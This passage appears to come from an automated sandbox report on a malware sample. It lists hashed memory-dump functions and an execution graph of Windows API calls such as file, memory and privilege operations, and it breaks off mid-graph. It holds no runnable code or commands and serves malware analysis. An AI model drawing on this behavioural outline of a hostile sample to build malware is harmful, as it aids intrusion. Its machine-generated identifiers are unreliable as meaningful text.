                                                    • Snapshot File: hcaresult_0_2_2f70000_hOe2JrpIAE.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: e46d922331b7b7c03444cfdfbf916c71917ddf4352646880e6cf4aaafb8c6a3e
                                                    • Instruction ID: 2a3faeb2bcd1e5df621f8da0f810c212136c352b17c39f25741bb22cec62bccd
                                                    • Opcode Fuzzy Hash: e46d922331b7b7c03444cfdfbf916c71917ddf4352646880e6cf4aaafb8c6a3e
                                                    • Instruction Fuzzy Hash: 8712A5F04217858AD732CF25E94C1893BA1B741318B97431AD2712F2E9E7B4126FEF86
                                                    Function 0725E068 Relevance: .3, Instructions: 312COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2007539710.0000000007250000.00000040.00000800.00020000.00000000.sdmp, Offset: 07250000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7250000_hOe2JrpIAE.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 3ddf816c25a221e2fd3a1a271e266b60ce8c04bc0ce1bf9c1952e9766abecd14
                                                    • Instruction ID: 4d666395a58a05d9eb648c1d1b9739875cc20918c4f627a2ba0b3b2ae7035e75
                                                    • Opcode Fuzzy Hash: 3ddf816c25a221e2fd3a1a271e266b60ce8c04bc0ce1bf9c1952e9766abecd14
                                                    • Instruction Fuzzy Hash: 0DE1F9B4E152198FCB14DFA9C5909AEFBF2FF89304F248169D814AB355D730A942CFA1
                                                    Function 0725D6B8 Relevance: .3, Instructions: 312COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2007539710.0000000007250000.00000040.00000800.00020000.00000000.sdmp, Offset: 07250000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7250000_hOe2JrpIAE.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 88304023805a330e971652f7dda938dc04b3967660484c855f6c2497324aff8f
                                                    • Instruction ID: bbea23b4612a015f2bb002efc7ccaaf294b8f8223596e136e56c173e2a8aae48
                                                    • Opcode Fuzzy Hash: 88304023805a330e971652f7dda938dc04b3967660484c855f6c2497324aff8f
                                                    • Instruction Fuzzy Hash: EFE1EAB4E141198FCB14DFA9C5909AEFBF2FF89304F248169D815AB355D730A982CFA0
                                                    Function 055BE460 Relevance: .3, Instructions: 312COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2006803717.00000000055B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055B0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_55b0000_hOe2JrpIAE.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: e13b1d64efc5568df569177e46bc15bce6a136239f2546a0e9d75db53632e8b4
                                                    • Instruction ID: f788b2b2bd8bc4447e7c060f73d3e855cb2528fad4dcb397726f3a57f4fa3c49
                                                    • Opcode Fuzzy Hash: e13b1d64efc5568df569177e46bc15bce6a136239f2546a0e9d75db53632e8b4
                                                    • Instruction Fuzzy Hash: 57E12774E041198FDB14DFA9C5959EEFBB2FF89300F248169E818AB355D770A942CFA0
                                                    Function 055BECD0 Relevance: .3, Instructions: 312COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2006803717.00000000055B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055B0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_55b0000_hOe2JrpIAE.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 13a85c2131d8caa967326c2d2f6fc86e84a5ffb3bd0f5da311b3d72c458e7f6f
                                                    • Instruction ID: 650b977ba7bce479efe8076e633170da8e598f9750b7e2558ed3528941de83b7
                                                    • Opcode Fuzzy Hash: 13a85c2131d8caa967326c2d2f6fc86e84a5ffb3bd0f5da311b3d72c458e7f6f
                                                    • Instruction Fuzzy Hash: B5E13874E041198FDB14DFA9C5949AEFBF2FF89304F248169D818AB315C771A982CFA0
                                                    Function 055BE898 Relevance: .3, Instructions: 312COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2006803717.00000000055B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055B0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_55b0000_hOe2JrpIAE.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: fd516c52c610d69fea6b445cf7f3c13f487b7cf68ceadb24ce7db567d633e633
                                                    • Instruction ID: c52839b948983fc4ebefee68f2932a4d788ba62574d48d9ca1110adc5b606cce
                                                    • Opcode Fuzzy Hash: fd516c52c610d69fea6b445cf7f3c13f487b7cf68ceadb24ce7db567d633e633
                                                    • Instruction Fuzzy Hash: F3E138B4E041198FDB14DFA9C5959EEFBB2FF89300F248169D809AB355D770A942CFA0
                                                    Function 0729A848 Relevance: .3, Instructions: 264COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2007574800.0000000007290000.00000040.00000800.00020000.00000000.sdmp, Offset: 07290000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7290000_hOe2JrpIAE.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 950dd30ed8d9f3879fa0b2438351764742277e736fc84a9a71f91818a9710260
                                                    • Instruction ID: 78875b62604d6a6f6c016e7bb8bb23bc15cc14b4415d5e52d24533ea651f8d00
                                                    • Opcode Fuzzy Hash: 950dd30ed8d9f3879fa0b2438351764742277e736fc84a9a71f91818a9710260
                                                    • Instruction Fuzzy Hash: A7D1F531C20B5A8ACB14EB64D990699B7B1FFD5300F20DB9AE41977210EFB06AC5DF91
                                                    Function 02F70040 Relevance: .3, Instructions: 260COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2005324672.0000000002F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F70000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_2f70000_hOe2JrpIAE.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: a4783cba375d796a99a6cfa3b8a3d4b4be12bb1a56e38ce03208ebb5cf3cfaab
                                                    • Instruction ID: 1196e0aa6dbdc3ef7f241c326528ff84aae988a1beaae6da28ac4854d26ffac6
                                                    • Opcode Fuzzy Hash: a4783cba375d796a99a6cfa3b8a3d4b4be12bb1a56e38ce03208ebb5cf3cfaab
                                                    • Instruction Fuzzy Hash: BFA19D32E0021A8FCF09DFB5C84499EB7F2FF88305B15857AE901AB265DB75E915CB40
                                                    Function 02F709F0 Relevance: .2, Instructions: 226COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2005324672.0000000002F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F70000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_2f70000_hOe2JrpIAE.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 0e158dad09cbfe72a98b0524758fff0db33199d803e162a6aaa4ce408c705673
                                                    • Instruction ID: b884d5e2d90c4ead4355f8b8dfa313e1ed475ea62b9b48fc94836ce0fc2ee793
                                                    • Opcode Fuzzy Hash: 0e158dad09cbfe72a98b0524758fff0db33199d803e162a6aaa4ce408c705673
                                                    • Instruction Fuzzy Hash: 25C11BB04217458AD726CF24E8481893BB1BB81324F57431BD1716F2E9EBB4166FEF46
                                                    Function 07290040 Relevance: .1, Instructions: 117COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2007574800.0000000007290000.00000040.00000800.00020000.00000000.sdmp, Offset: 07290000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7290000_hOe2JrpIAE.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: b7602e0430c8f4a465e96f64655a9875453f769ca75079af897dd0a83b561628
                                                    • Instruction ID: 7be09bee002148853d6941490d0508050bc251d3ee87add778324ec5834f4017
                                                    • Opcode Fuzzy Hash: b7602e0430c8f4a465e96f64655a9875453f769ca75079af897dd0a83b561628
                                                    • Instruction Fuzzy Hash: 4A5185B4D016198BEB68CF6AD94479DFAF3AFC8201F14C1EAD44DA7264DB710A95CF00
                                                    Function 07290007 Relevance: .1, Instructions: 97COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2007574800.0000000007290000.00000040.00000800.00020000.00000000.sdmp, Offset: 07290000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7290000_hOe2JrpIAE.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 1b25f14fb1b723f004c77f44ab20101baf58a7ae9b9e5ab38e3d9d324ddbddc0
                                                    • Instruction ID: 9a00ec1cfe2cf5eea1f7c52e5bf42ee3aafdd25d0b4bd653fccb8479eabe7434
                                                    • Opcode Fuzzy Hash: 1b25f14fb1b723f004c77f44ab20101baf58a7ae9b9e5ab38e3d9d324ddbddc0
                                                    • Instruction Fuzzy Hash: 1141C9B1D057598FEB59CF6BC804389BBF3AFC5204F18C0EAC448AB265EB7509858F50
                                                    Function 05020006 Relevance: .1, Instructions: 94COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2006739565.0000000005020000.00000040.00000800.00020000.00000000.sdmp, Offset: 05020000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_5020000_hOe2JrpIAE.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 41081ba81fe93d3a65f3bf5a25e9049be6b21081a4b63426013607d969e7128f
                                                    • Instruction ID: 8d4d8903e67e30152131936d47d2f2460b30feb3e59b3856caef616252f279c9
                                                    • Opcode Fuzzy Hash: 41081ba81fe93d3a65f3bf5a25e9049be6b21081a4b63426013607d969e7128f
                                                    • Instruction Fuzzy Hash: 4C41A871D097688FDB59CF6798143DEBBB6AF86304F08C0EAC44CAA265DB740989CF51

                                                    Execution Graph

                                                    Execution Coverage:1.4%
                                                    Dynamic/Decrypted Code Coverage:2.7%
                                                    Signature Coverage:5.8%
                                                    Total number of Nodes:555
                                                    Total number of Limit Nodes:71
                                                    execution_graph 98730 41f190 98733 41b970 98730->98733 98734 41b996 98733->98734 98741 409d40 98734->98741 98736 41b9a2 98740 41b9c3 98736->98740 98749 40c1c0 98736->98749 98738 41b9b5 98785 41a6b0 98738->98785 98788 409c90 98741->98788 98743 409d4d 98744 409d54 98743->98744 98800 409c30 98743->98800 98744->98736 98750 40c1e5 98749->98750 99219 40b1c0 98750->99219 98752 40c23c 99223 40ae40 98752->99223 98754 40c262 98784 40c4b3 98754->98784 99232 4143a0 98754->99232 98756 40c2a7 98756->98784 99235 408a60 98756->99235 98758 40c2eb 98758->98784 99242 41a500 98758->99242 98762 40c341 98763 40c348 98762->98763 99254 41a010 98762->99254 98764 41bdc0 2 API calls 98763->98764 98766 40c355 98764->98766 98766->98738 98768 40c392 98769 41bdc0 2 API calls 98768->98769 98770 40c399 98769->98770 98770->98738 98771 40c3a2 98772 40f4a0 3 API calls 98771->98772 98773 40c416 98772->98773 98773->98763 98774 40c421 98773->98774 98775 41bdc0 2 API calls 98774->98775 98776 40c445 98775->98776 99259 41a060 98776->99259 98779 41a010 2 API calls 98780 40c480 98779->98780 98780->98784 99264 419e20 98780->99264 98783 41a6b0 2 API calls 98783->98784 98784->98738 98786 41a6cf ExitProcess 98785->98786 98787 41af60 LdrLoadDll 98785->98787 98787->98786 98819 418bc0 98788->98819 98792 409cb6 98792->98743 98793 409cac 98793->98792 98826 41b2b0 98793->98826 98795 409cf3 98795->98792 98837 409ab0 98795->98837 98797 409d13 98843 409620 LdrLoadDll 98797->98843 98799 409d25 98799->98743 99194 41b5a0 98800->99194 98803 41b5a0 LdrLoadDll 98804 409c5b 98803->98804 98805 41b5a0 LdrLoadDll 98804->98805 98806 409c71 98805->98806 98807 40f180 98806->98807 98808 40f199 98807->98808 99202 40b040 98808->99202 98810 40f1ac 99206 41a1e0 98810->99206 98813 409d65 98813->98736 98815 40f1d2 98816 40f1fd 98815->98816 99212 41a260 98815->99212 98817 41a490 2 API calls 98816->98817 98817->98813 98820 418bcf 98819->98820 98844 414e50 98820->98844 98822 409ca3 98823 418a70 98822->98823 98850 41a600 98823->98850 98827 41b2c9 98826->98827 98857 414a50 98827->98857 98829 41b2e1 98830 41b2ea 98829->98830 98896 41b0f0 98829->98896 98830->98795 98832 41b2fe 98832->98830 98914 419f00 98832->98914 98840 409aca 98837->98840 99172 407ea0 98837->99172 98839 409ad1 98839->98797 98840->98839 99185 408160 98840->99185 98843->98799 98845 414e6a 98844->98845 98846 414e5e 98844->98846 98845->98822 98846->98845 98849 4152d0 LdrLoadDll 98846->98849 98848 414fbc 98848->98822 98849->98848 98851 418a85 98850->98851 98853 41af60 98850->98853 98851->98793 98854 41af70 98853->98854 98856 41af92 98853->98856 98855 414e50 LdrLoadDll 98854->98855 98855->98856 98856->98851 98858 414d85 98857->98858 98860 414a64 98857->98860 98858->98829 98860->98858 98922 419c50 98860->98922 98862 414b90 98925 41a360 98862->98925 98863 414b73 98982 41a460 LdrLoadDll 98863->98982 98866 414b7d 98866->98829 98867 414bb7 98868 41bdc0 2 API calls 98867->98868 98869 414bc3 98868->98869 98869->98866 98870 414d49 98869->98870 98871 414d5f 98869->98871 98876 414c52 98869->98876 98872 41a490 2 API calls 98870->98872 98991 414790 LdrLoadDll NtReadFile NtClose 98871->98991 98874 414d50 98872->98874 98874->98829 98875 414d72 98875->98829 98877 414cb9 98876->98877 98879 414c61 98876->98879 98877->98870 98878 414ccc 98877->98878 98984 41a2e0 98878->98984 98881 414c66 98879->98881 98882 414c7a 98879->98882 98983 414650 LdrLoadDll NtClose LdrInitializeThunk LdrInitializeThunk 98881->98983 98884 414c97 98882->98884 98885 414c7f 98882->98885 98884->98874 98940 414410 98884->98940 98928 4146f0 98885->98928 98887 414c70 98887->98829 98890 414d2c 98988 41a490 98890->98988 98891 414c8d 98891->98829 98894 414caf 98894->98829 98895 414d38 98895->98829 98898 41b101 98896->98898 98897 41b113 98897->98832 98898->98897 99009 41bd40 98898->99009 98900 41b134 99012 414070 98900->99012 98902 41b180 98902->98832 98903 41b157 98903->98902 98904 414070 3 API calls 98903->98904 98907 41b179 98904->98907 98906 41b20a 98908 41b21a 98906->98908 99138 41af00 LdrLoadDll 98906->99138 98907->98902 99044 415390 98907->99044 99054 41ad70 98908->99054 98911 41b248 99133 419ec0 98911->99133 98915 419f1c 98914->98915 98916 41af60 LdrLoadDll 98914->98916 99166 1182c0a 98915->99166 98916->98915 98917 419f37 98919 41bdc0 98917->98919 99169 41a670 98919->99169 98921 41b359 98921->98795 98923 41af60 LdrLoadDll 98922->98923 98924 414b44 98923->98924 98924->98862 98924->98863 98924->98866 98926 41af60 LdrLoadDll 98925->98926 98927 41a37c NtCreateFile 98926->98927 98927->98867 98929 41470c 98928->98929 98930 41a2e0 LdrLoadDll 98929->98930 98931 41472d 98930->98931 98932 414734 98931->98932 98933 414748 98931->98933 98934 41a490 2 API calls 98932->98934 98935 41a490 2 API calls 98933->98935 98936 41473d 98934->98936 98937 414751 98935->98937 98936->98891 98992 41bfd0 LdrLoadDll RtlAllocateHeap 98937->98992 98939 41475c 98939->98891 98941 41445b 98940->98941 98942 41448e 98940->98942 98944 41a2e0 LdrLoadDll 98941->98944 98943 4145d9 98942->98943 98947 4144aa 98942->98947 98946 41a2e0 LdrLoadDll 98943->98946 98945 414476 98944->98945 98948 41a490 2 API calls 98945->98948 98952 4145f4 98946->98952 98949 41a2e0 LdrLoadDll 98947->98949 98950 41447f 98948->98950 98951 4144c5 98949->98951 98950->98894 98954 4144e1 98951->98954 98955 4144cc 98951->98955 99005 41a320 LdrLoadDll 98952->99005 98958 4144e6 98954->98958 98959 4144fc 98954->98959 98957 41a490 2 API calls 98955->98957 98956 41462e 98960 41a490 2 API calls 98956->98960 98961 4144d5 98957->98961 98962 41a490 2 API calls 98958->98962 98968 414501 98959->98968 98993 41bf90 98959->98993 98963 414639 98960->98963 98961->98894 98964 4144ef 98962->98964 98963->98894 98964->98894 98965 414513 98965->98894 98968->98965 98996 41a410 98968->98996 98969 414567 98974 41457e 98969->98974 99004 41a2a0 LdrLoadDll 98969->99004 98971 414585 98975 41a490 2 API calls 98971->98975 98972 41459a 98973 41a490 2 API calls 98972->98973 98976 4145a3 98973->98976 98974->98971 98974->98972 98975->98965 98977 4145cf 98976->98977 98999 41bb90 98976->98999 98977->98894 98979 4145ba 98980 41bdc0 2 API calls 98979->98980 98981 4145c3 98980->98981 98981->98894 98982->98866 98983->98887 98985 41af60 LdrLoadDll 98984->98985 98986 414d14 98985->98986 98987 41a320 LdrLoadDll 98986->98987 98987->98890 98989 41af60 LdrLoadDll 98988->98989 98990 41a4ac NtClose 98989->98990 98990->98895 98991->98875 98992->98939 99006 41a630 98993->99006 98995 41bfa8 98995->98968 98997 41a42c NtReadFile 98996->98997 98998 41af60 LdrLoadDll 98996->98998 98997->98969 98998->98997 99000 41bbb4 98999->99000 99001 41bb9d 98999->99001 99000->98979 99001->99000 99002 41bf90 2 API calls 99001->99002 99003 41bbcb 99002->99003 99003->98979 99004->98974 99005->98956 99007 41af60 LdrLoadDll 99006->99007 99008 41a64c RtlAllocateHeap 99007->99008 99008->98995 99139 41a540 99009->99139 99011 41bd6d 99011->98900 99013 414081 99012->99013 99014 414089 99012->99014 99013->98903 99043 41435c 99014->99043 99142 41cf30 99014->99142 99016 4140dd 99017 41cf30 2 API calls 99016->99017 99021 4140e8 99017->99021 99018 414136 99020 41cf30 2 API calls 99018->99020 99022 41414a 99020->99022 99021->99018 99023 41d060 3 API calls 99021->99023 99153 41cfd0 LdrLoadDll RtlAllocateHeap RtlFreeHeap 99021->99153 99024 4141a7 99022->99024 99147 41d060 99022->99147 99023->99021 99025 41cf30 2 API calls 99024->99025 99026 4141bd 99025->99026 99028 4141fa 99026->99028 99030 41d060 3 API calls 99026->99030 99029 41cf30 2 API calls 99028->99029 99031 414205 99029->99031 99030->99026 99032 41d060 3 API calls 99031->99032 99038 41423f 99031->99038 99032->99031 99034 414334 99155 41cf90 LdrLoadDll RtlFreeHeap 99034->99155 99036 41433e 99156 41cf90 LdrLoadDll RtlFreeHeap 99036->99156 99154 41cf90 LdrLoadDll RtlFreeHeap 99038->99154 99039 414348 99157 41cf90 LdrLoadDll RtlFreeHeap 99039->99157 99041 414352 99158 41cf90 LdrLoadDll RtlFreeHeap 99041->99158 99043->98903 99045 41539b 99044->99045 99046 414a50 8 API calls 99045->99046 99047 4153b7 99046->99047 99048 4153f2 99047->99048 99049 415405 99047->99049 99053 41540a 99047->99053 99050 41bdc0 2 API calls 99048->99050 99051 41bdc0 2 API calls 99049->99051 99052 4153f7 99050->99052 99051->99053 99052->98906 99053->98906 99055 41ad84 99054->99055 99056 41ac30 LdrLoadDll 99054->99056 99159 41ac30 99055->99159 99056->99055 99059 41ac30 LdrLoadDll 99060 41ad96 99059->99060 99061 41ac30 LdrLoadDll 99060->99061 99062 41ad9f 99061->99062 99063 41ac30 LdrLoadDll 99062->99063 99064 41ada8 99063->99064 99065 41ac30 LdrLoadDll 99064->99065 99066 41adb1 99065->99066 99067 41ac30 LdrLoadDll 99066->99067 99068 41adbd 99067->99068 99069 41ac30 LdrLoadDll 99068->99069 99070 41adc6 99069->99070 99071 41ac30 LdrLoadDll 99070->99071 99072 41adcf 99071->99072 99073 41ac30 LdrLoadDll 99072->99073 99074 41add8 99073->99074 99075 41ac30 LdrLoadDll 99074->99075 99076 41ade1 99075->99076 99077 41ac30 LdrLoadDll 99076->99077 99078 41adea 99077->99078 99079 41ac30 LdrLoadDll 99078->99079 99080 41adf6 99079->99080 99081 41ac30 LdrLoadDll 99080->99081 99082 41adff 99081->99082 99083 41ac30 LdrLoadDll 99082->99083 99084 41ae08 99083->99084 99085 41ac30 LdrLoadDll 99084->99085 99086 41ae11 99085->99086 99087 41ac30 LdrLoadDll 99086->99087 99088 41ae1a 99087->99088 99089 41ac30 LdrLoadDll 99088->99089 99090 41ae23 99089->99090 99091 41ac30 LdrLoadDll 99090->99091 99092 41ae2f 99091->99092 99093 41ac30 LdrLoadDll 99092->99093 99094 41ae38 99093->99094 99095 41ac30 LdrLoadDll 99094->99095 99096 41ae41 99095->99096 99097 41ac30 LdrLoadDll 99096->99097 99098 41ae4a 99097->99098 99099 41ac30 LdrLoadDll 99098->99099 99100 41ae53 99099->99100 99101 41ac30 LdrLoadDll 99100->99101 99102 41ae5c 99101->99102 99103 41ac30 LdrLoadDll 99102->99103 99104 41ae68 99103->99104 99105 41ac30 LdrLoadDll 99104->99105 99106 41ae71 99105->99106 99107 41ac30 LdrLoadDll 99106->99107 99108 41ae7a 99107->99108 99109 41ac30 LdrLoadDll 99108->99109 99110 41ae83 99109->99110 99111 41ac30 LdrLoadDll 99110->99111 99112 41ae8c 99111->99112 99113 41ac30 LdrLoadDll 99112->99113 99114 41ae95 99113->99114 99115 41ac30 LdrLoadDll 99114->99115 99116 41aea1 99115->99116 99117 41ac30 LdrLoadDll 99116->99117 99118 41aeaa 99117->99118 99119 41ac30 LdrLoadDll 99118->99119 99120 41aeb3 99119->99120 99121 41ac30 LdrLoadDll 99120->99121 99122 41aebc 99121->99122 99123 41ac30 LdrLoadDll 99122->99123 99124 41aec5 99123->99124 99125 41ac30 LdrLoadDll 99124->99125 99126 41aece 99125->99126 99127 41ac30 LdrLoadDll 99126->99127 99128 41aeda 99127->99128 99129 41ac30 LdrLoadDll 99128->99129 99130 41aee3 99129->99130 99131 41ac30 LdrLoadDll 99130->99131 99132 41aeec 99131->99132 99132->98911 99134 41af60 LdrLoadDll 99133->99134 99135 419edc 99134->99135 99165 1182df0 LdrInitializeThunk 99135->99165 99136 419ef3 99136->98832 99138->98908 99140 41af60 LdrLoadDll 99139->99140 99141 41a55c NtAllocateVirtualMemory 99140->99141 99141->99011 99143 41cf40 99142->99143 99144 41cf46 99142->99144 99143->99016 99145 41bf90 2 API calls 99144->99145 99146 41cf6c 99145->99146 99146->99016 99148 41cfd0 99147->99148 99149 41d02d 99148->99149 99150 41bf90 2 API calls 99148->99150 99149->99022 99151 41d00a 99150->99151 99152 41bdc0 2 API calls 99151->99152 99152->99149 99153->99021 99154->99034 99155->99036 99156->99039 99157->99041 99158->99043 99160 41ac4b 99159->99160 99161 414e50 LdrLoadDll 99160->99161 99162 41ac6b 99161->99162 99163 414e50 LdrLoadDll 99162->99163 99164 41ad17 99162->99164 99163->99164 99164->99059 99165->99136 99167 1182c1f LdrInitializeThunk 99166->99167 99168 1182c11 99166->99168 99167->98917 99168->98917 99170 41a68c RtlFreeHeap 99169->99170 99171 41af60 LdrLoadDll 99169->99171 99170->98921 99171->99170 99173 407eb0 99172->99173 99174 407eab 99172->99174 99175 41bd40 2 API calls 99173->99175 99174->98840 99178 407ed5 99175->99178 99176 407f38 99176->98840 99177 419ec0 2 API calls 99177->99178 99178->99176 99178->99177 99179 407f3e 99178->99179 99183 41bd40 2 API calls 99178->99183 99188 41a5c0 99178->99188 99181 407f64 99179->99181 99182 41a5c0 2 API calls 99179->99182 99181->98840 99184 407f55 99182->99184 99183->99178 99184->98840 99186 40817e 99185->99186 99187 41a5c0 2 API calls 99185->99187 99186->98797 99187->99186 99189 41af60 LdrLoadDll 99188->99189 99190 41a5dc 99189->99190 99193 1182c70 LdrInitializeThunk 99190->99193 99191 41a5f3 99191->99178 99193->99191 99195 41b5c3 99194->99195 99198 40acf0 99195->99198 99199 40ad14 99198->99199 99200 40ad50 LdrLoadDll 99199->99200 99201 409c4a 99199->99201 99200->99201 99201->98803 99204 40b063 99202->99204 99203 40b0e0 99203->98810 99204->99203 99217 419c90 LdrLoadDll 99204->99217 99207 41af60 LdrLoadDll 99206->99207 99208 40f1bb 99207->99208 99208->98813 99209 41a7d0 99208->99209 99210 41a7ef LookupPrivilegeValueW 99209->99210 99211 41af60 LdrLoadDll 99209->99211 99210->98815 99211->99210 99213 41a27c 99212->99213 99214 41af60 LdrLoadDll 99212->99214 99218 1182ea0 LdrInitializeThunk 99213->99218 99214->99213 99215 41a29b 99215->98816 99217->99203 99218->99215 99220 40b1f0 99219->99220 99221 40b040 LdrLoadDll 99220->99221 99222 40b204 99221->99222 99222->98752 99224 40ae51 99223->99224 99225 40ae4d 99223->99225 99226 40ae6a 99224->99226 99227 40ae9c 99224->99227 99225->98754 99269 419cd0 LdrLoadDll 99226->99269 99270 419cd0 LdrLoadDll 99227->99270 99229 40aead 99229->98754 99231 40ae8c 99231->98754 99233 40f4a0 3 API calls 99232->99233 99234 4143c6 99233->99234 99234->98756 99236 408a79 99235->99236 99271 4087a0 99235->99271 99238 408a9d 99236->99238 99239 4087a0 19 API calls 99236->99239 99238->98758 99240 408a8a 99239->99240 99240->99238 99289 40f710 10 API calls 99240->99289 99243 41af60 LdrLoadDll 99242->99243 99244 41a51c 99243->99244 99408 1182e80 LdrInitializeThunk 99244->99408 99245 40c322 99247 40f4a0 99245->99247 99248 40f4bd 99247->99248 99409 419fc0 99248->99409 99251 40f505 99251->98762 99252 41a010 2 API calls 99253 40f52e 99252->99253 99253->98762 99255 41af60 LdrLoadDll 99254->99255 99256 41a02c 99255->99256 99415 1182d10 LdrInitializeThunk 99256->99415 99257 40c385 99257->98768 99257->98771 99260 41af60 LdrLoadDll 99259->99260 99261 41a07c 99260->99261 99416 1182d30 LdrInitializeThunk 99261->99416 99262 40c459 99262->98779 99265 41af60 LdrLoadDll 99264->99265 99266 419e3c 99265->99266 99417 1182fb0 LdrInitializeThunk 99266->99417 99267 40c4ac 99267->98783 99269->99231 99270->99229 99272 407ea0 4 API calls 99271->99272 99286 4087ba 99271->99286 99272->99286 99273 408a49 99273->99236 99274 408a3f 99275 408160 2 API calls 99274->99275 99275->99273 99278 419f00 2 API calls 99278->99286 99282 40c4c0 LdrLoadDll NtClose LdrInitializeThunk LdrInitializeThunk LdrInitializeThunk 99282->99286 99285 419e20 2 API calls 99285->99286 99286->99273 99286->99274 99286->99278 99286->99282 99286->99285 99287 41a490 LdrLoadDll NtClose 99286->99287 99290 419d10 99286->99290 99293 4085d0 99286->99293 99305 40f5f0 LdrLoadDll NtClose 99286->99305 99306 419d90 LdrLoadDll 99286->99306 99307 419dc0 LdrLoadDll 99286->99307 99308 419e50 LdrLoadDll 99286->99308 99309 4083a0 99286->99309 99325 405f60 LdrLoadDll 99286->99325 99287->99286 99289->99238 99291 419d2c 99290->99291 99292 41af60 LdrLoadDll 99290->99292 99291->99286 99292->99291 99294 4085e6 99293->99294 99326 419880 99294->99326 99296 408771 99296->99286 99297 4085ff 99297->99296 99347 4081a0 99297->99347 99299 4086e5 99299->99296 99300 4083a0 11 API calls 99299->99300 99301 408713 99300->99301 99301->99296 99302 419f00 2 API calls 99301->99302 99303 408748 99302->99303 99303->99296 99304 41a500 2 API calls 99303->99304 99304->99296 99305->99286 99306->99286 99307->99286 99308->99286 99310 4083c9 99309->99310 99387 408310 99310->99387 99313 41a500 2 API calls 99314 4083dc 99313->99314 99314->99313 99315 408467 99314->99315 99318 408462 99314->99318 99395 40f670 99314->99395 99315->99286 99316 41a490 2 API calls 99317 40849a 99316->99317 99317->99315 99319 419d10 LdrLoadDll 99317->99319 99318->99316 99320 4084ff 99319->99320 99320->99315 99399 419d50 99320->99399 99322 408563 99322->99315 99323 414a50 8 API calls 99322->99323 99324 4085b8 99323->99324 99324->99286 99325->99286 99327 41bf90 2 API calls 99326->99327 99328 419897 99327->99328 99354 409310 99328->99354 99330 4198b2 99331 4198f0 99330->99331 99332 4198d9 99330->99332 99335 41bd40 2 API calls 99331->99335 99333 41bdc0 2 API calls 99332->99333 99334 4198e6 99333->99334 99334->99297 99336 41992a 99335->99336 99337 41bd40 2 API calls 99336->99337 99338 419943 99337->99338 99343 419be4 99338->99343 99360 41bd80 99338->99360 99341 419bd0 99342 41bdc0 2 API calls 99341->99342 99344 419bda 99342->99344 99345 41bdc0 2 API calls 99343->99345 99344->99297 99346 419c39 99345->99346 99346->99297 99348 40829f 99347->99348 99349 4081b5 99347->99349 99348->99299 99349->99348 99350 414a50 8 API calls 99349->99350 99351 408222 99350->99351 99352 41bdc0 2 API calls 99351->99352 99353 408249 99351->99353 99352->99353 99353->99299 99355 409335 99354->99355 99356 40acf0 LdrLoadDll 99355->99356 99357 409368 99356->99357 99359 40938d 99357->99359 99363 40cf20 99357->99363 99359->99330 99381 41a580 99360->99381 99364 40cf4c 99363->99364 99365 41a1e0 LdrLoadDll 99364->99365 99366 40cf65 99365->99366 99367 40cf6c 99366->99367 99374 41a220 99366->99374 99367->99359 99371 40cfa7 99372 41a490 2 API calls 99371->99372 99373 40cfca 99372->99373 99373->99359 99375 41a23c 99374->99375 99376 41af60 